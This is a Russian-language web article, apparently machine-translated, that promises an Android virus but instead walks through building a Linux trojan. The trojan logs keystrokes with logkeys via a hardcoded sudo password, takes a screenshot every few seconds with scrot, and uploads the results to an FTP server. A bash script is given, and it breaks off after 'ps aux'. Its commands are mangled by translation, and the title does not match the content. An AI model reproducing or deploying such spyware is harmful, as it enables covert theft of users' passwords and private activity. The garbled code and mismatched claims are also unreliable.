Как сделать вирус Android?

на самом деле редко можно получить вирусы в системах на основе Unix. Причина этого в том, что с Unix-системами вы, как пользователь, должны сообщать ОС обо всем, что она делает. Таким образом, вы никогда не беспокоитесь о куче фоновых вещей.

Теперь вы, вероятно, думаете сами за себя: я не могу назвать систему ядром , а затем вызывать образ initrd, чтобы я мог запустить систему. И если вы используете среду рабочего стола с графическим интерфейсом, вы, вероятно, хорошо думаете, я не говорю GNOME , KDE , LXDE или тому, что когда-либо запускалось.

Ну, вы можете быть правы. И причина этого в том, что создатели конкретной * nix-системы добавили скрипт, который сообщает, что нужно запускать. Если вы измените скрипт, вы можете удалить некоторые вещи из запуска. А некоторые разработчики предпочитают позволить пользователю добавлять дополнительные вещи, которые они захотят запустить при запуске или при входе в систему. К таким дистрибутивам Linux, имеющим такие возможности, относятся Ubuntu , Bennix , « системы на базе Red Hat ( Fedora , Cent OS , Red Hat Enterprise).

Зная это, можно создавать вирусы для некоторых систем на основе Unix. Это просто точка знания, как. Другая проблема заключается в том, что пользователь должен сообщить системе все, что нужно сделать. И что пользователь должен иметь права root для установки программ. Это означает, что пользователь не сможет получить вирус, если он или она не является пользователем root. Это означает, что лучший способ для писателя вирусов Unix — создать трояна, чтобы обманным путем заставить пользователя установить вирус.

Вот краткое и грязное руководство по созданию троянских вирусов. Он был протестирован на Ubuntu , Fedora и Bennix 10.10 . Этот троянец использует несколько других готовых программ, которые используются законным образом, и использует их злонамеренно. Программы, которые он использует, перечислены ниже.

  • logkeys (встречается как в Ubuntu Repo, так и в Fedora Repos)
  • scrot (встречается как в Ubuntu, так и в Fedora Repos)
  • FTP (поставляется с большинством Unix-систем)
  • PS (поставляется с большинством систем Linux)

Если это еще не заметно, что будет делать этот вирус. Он в значительной степени регистрирует нажатия клавиш и делает снимки экрана каждые несколько секунд на экране пользователя. Он использует FTP для загрузки собираемой информации на FTP-сервер. Однако это также можно сделать, используя SSH или отправив их по электронной почте. Но имейте в виду, что это всего лишь быстрый и грязный троян. Таким образом, мы получаем программы на компьютере человека. Затем мы пишем троян в двух сценариях. И спрятать их в специальном месте на компьютере.

Код для первого скрипта указан ниже. Этот скрипт является скриптом bash .

  1. #! / Bin / Баш
  2. CD / TMP
  3. мкдир кл
  4. кд / тмп / кл
  5. скриншоты mkdir
  6. процессы MKDIR
  7. коснуться кл . журнал
  8. эхо пароль | sudo - S logkeys - запуск - вывод / tmp / kl / kl . журнал
  9. для (( ; ; ))
  10. делать
  11. для подсчета в { 1 .. 10 }
  12. делать
  13. scrot - q 100 / tmp / kl / скриншоты / `дата ' % H-% M-% Y-% m-% d'` . PNG
  14. ps aux
0

Ура! Вы первые нашли эту информацию, сделайте доброе дело, поделитесь ей в: